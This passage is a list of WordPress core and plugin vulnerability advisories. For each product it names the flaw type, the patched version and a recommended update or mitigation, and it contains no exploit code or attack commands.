Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery via duplicate_feed
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Core: WordPress

Vulnerability: Not specified in this listing (affected versions <= 6.3.1)
Patched Version: 4.7.27
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: gravity-file-ajax-upload-free

Vulnerability: Unrestricted File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Companion Auto Update

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Missing Authorization Checks leading to Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10Web Social Post Feed

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.1.27
Recommended Action: Update to version 1.1.27, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Cross-Site Scripting via label
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: Visual Composer Website Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘Text Block’
Patched Version: 45.0.1
Recommended Action: Update to version 45.0.1, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.32
Recommended Action: Update to version 7.32, or a newer patched version

Plugin: Simple Basic Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 20221201
Recommended Action: Update to version 20221201, or a newer patched version

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Authenticated (Editor+) Server-Side Request Forgery
Patched Version: 1.14.6
Recommended Action: Update to version 1.14.6, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Reflected Cross-Site Scripting via Page
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Job Board by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPGet API – Connect to any external REST API

Vulnerability: Not named in the source listing (the entry records only the affected version, 2.2.1)
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Missing Authorization
Patched Version: 1.0.99
Recommended Action: Update to version 1.0.99, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.8.4
Recommended Action: Update to version 1.9.8.4, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Foliopress WYSIWYG

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.8.5
Recommended Action: Update to version 2.6.8.5, or a newer patched version

Plugin: VK All in One Expansion Unit

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: 9.87.1.0
Recommended Action: Update to version 9.87.1.0, or a newer patched version

Plugin: WP Email Users

Vulnerability: SQL Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: BNG Gateway For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube Video Inserter

Vulnerability: Not named in the source listing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Online Lesson Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.8.7
Recommended Action: Update to version 0.8.7, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization Checks
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: Simple Page Transition

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP RSS By Publishers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Sensitive Information Exposure
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WP Reroute Email

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Missing Authorization via init
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.27
Recommended Action: Update to version 3.3.27, or a newer patched version

Plugin: Localize My Post

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.2.9
Recommended Action: Update to version 6.2.9, or a newer patched version

Plugin: Slideshow Gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TweetScribe

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Payment Gateway per Category

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Optin Forms – Simple List Building Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Wbcom Designs – BuddyPress Group Reviews

Vulnerability: Unauthorized AJAX Actions due to Nonce Bypass
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 7.3.10
Recommended Action: Update to version 7.3.10, or a newer patched version

Plugin: WP-ViperGB

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: FoxyPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CT Commerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Instagram for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting via ‘event_id’
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Unrestricted SVG Uploads
Patched Version: 3.0.14
Recommended Action: Update to version 3.0.14, or a newer patched version

Plugin: External Media

Vulnerability: Authenticated (Author+) File Upload to Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube Playlist Player

Vulnerability: Cross-Site Request Forgery in ytpp_settings
Patched Version: 4.6.5
Recommended Action: Update to version 4.6.5, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: CSV Injection
Patched Version: 2.9.28
Recommended Action: Update to version 2.9.28, or a newer patched version

Plugin: Fast Flow

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Products Quick View for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Creative Contact Form

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Very Simple Quiz

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Espresso Free

Vulnerability: Authenticated SQL Injection
Patched Version: 3.1.37.12.L
Recommended Action: Update to version 3.1.37.12.L, or a newer patched version

Plugin: Generate PDF using Contact Form 7

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Information Disclosure
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Subscriber+ Arbitrary File/Folder Deletion
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.44
Recommended Action: Update to version 4.3.44, or a newer patched version

Plugin: MainWP File Uploader Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Superb slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 13.2
Recommended Action: Update to version 13.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.3.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.3.6, 3.4.8, 3.5.9, 3.6.6, 3.7.2, 3.8.2, 3.9.4, 4.0.2, 4.1.2, 4.2.3, 4.3.4, 4.4.2, 4.5.3, 4.6.3, 4.7.2, 4.8.1, 4.9.3, 5.0.1, 5.1.1, 5.2.3, 5.3.1, 5.4.2, 5.5.1, 5.5.2

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Multiple SQL Injections
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Continuous Image Carousel With Lightbox

Vulnerability: Reflected Cross-Site Scripting via search_term, order_by and order_pos
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: PDF Block

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multicons [ Multiple Favicons ]

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WP CleanFix

Vulnerability: Remote Code Execution
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.19.2
Recommended Action: Update to version 2.19.2, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Sensitive Information Exposure
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Not named in the source listing (the entry records only the affected versions, <= 1.8.19)
Patched Version: 1.8.20
Recommended Action: Update to version 1.8.20, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Unauthenticated Stored Cross-Site Scripting via REST API
Patched Version: 9.0.28
Recommended Action: Update to version 9.0.28, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Directory Traversal
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: WP-Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.9.1
Recommended Action: Update to version 1.6.9.1, or a newer patched version

Plugin: G-Lock Double Opt-in Manager

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Read more By Adam

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Flipbox – Awesomes Flip Boxes Image Overlay

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Magee Shortcodes

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass to Information Disclosure
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more!

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9.4
Recommended Action: Update to version 1.4.9.4, or a newer patched version

Plugin: Export All URLs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Site Reviews

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.13.1
Recommended Action: Update to version 5.13.1, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Mediabay – Media Library Folders

Vulnerability: Missing Authorization via AJAX actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Amazon Affiliate Link Localizer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Block Plugin Update

Vulnerability: Cross-Site Request Forgery via bspu_plugin_select.php
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: Easy Updates Manager

Vulnerability: Insufficient Restrictions on Option Changes
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: Cookies by JM

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Cart Link for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WHIZZ

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Members Import

Vulnerability: Self Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: New User Approve

Vulnerability: Cross-Site Request Forgery via admin_notices
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 2.6.85
Recommended Action: Update to version 2.6.85, or a newer patched version

Plugin: Elementor Forms Google Sheet Connector Pro

Vulnerability: Reflected Cross-Site Scripting via ‘code’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smoothscroller

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery to File Deletion
Patched Version: 5.6.5
Recommended Action: Update to version 5.6.5, or a newer patched version

Plugin: WP Page Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_edit_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Shortcode IMDB

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.4.7
Recommended Action: Update to version 1.8.4.7, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Multiple Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Leyka

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.30
Recommended Action: Update to version 3.30, or a newer patched version

Plugin: Nextend Twitter Connect

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 10.4.3
Recommended Action: Update to version 10.4.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_multiple_files_for_post
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Subscriber+ Arbitrary File Upload
Patched Version: 4.24
Recommended Action: Update to version 4.24, or a newer patched version

Plugin: Testimonial Slider – Free Testimonials Slider Plugin

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.5.8.4
Recommended Action: Update to version 3.5.8.4, or a newer patched version

Plugin: WP-Table

Vulnerability: Remote File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: YITH WooCommerce Bulk Product Editing

Vulnerability: Authenticated Settings Change
Patched Version: 1.2.14
Recommended Action: Update to version 1.2.14, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.29.9
Recommended Action: Update to version 4.29.9, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress RokBox

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Arbitrary File Download
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Speed Booster Pack ⚡ PageSpeed Optimization Suite

Vulnerability: Admin+ SQL Injection
Patched Version: 4.3.3.1
Recommended Action: Update to version 4.3.3.1, or a newer patched version

Plugin: User Login History

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Post List Designer by Category – List Category Post Or Recent Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: If Menu – Visibility control for Menus

Vulnerability: Missing Authorization to Admin Settings Modification
Patched Version: 0.17
Recommended Action: Update to version 0.17, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Missing Authorization via handleBeforeGateway
Patched Version: 2.33.2
Recommended Action: Update to version 2.33.2, or a newer patched version

Plugin: Kama Click Counter

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: WebP Express

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.14.11
Recommended Action: Update to version 0.14.11, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: 0mk Shortener

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Cross-Site Request Forgery to Custom Field Creation
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: Jquery news ticker

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Server-Side Request Forgery
Patched Version: 4.5.9
Recommended Action: Update to version 4.5.9, or a newer patched version

Plugin: WP Plugin Lister

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W3 Total Cache

Vulnerability: Cross-Site Scripting via request_id
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Share and Follow

Vulnerability: Cross-Site Scripting
Patched Version: 1.80.4
Recommended Action: Update to version 1.80.4, or a newer patched version

Plugin: screets-lcx

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: IMPress Listings

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Google SEO Pressor for Rich snippets

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: PubyDoc – Data Tables and Charts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Vospari Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘user-submitted-content’
Patched Version: 20230811
Recommended Action: Update to version 20230811, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via social_icon_1 parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Regular Expression Denial of Service
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: ARI Fancy Lightbox – Popup for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Photospace Responsive Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: FontMeister – The Font Management Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Request Forgery Protection Bypass
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Greeklish-permalink

Vulnerability: Missing Authorization via cyrtrans_ajax_old AJAX action
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

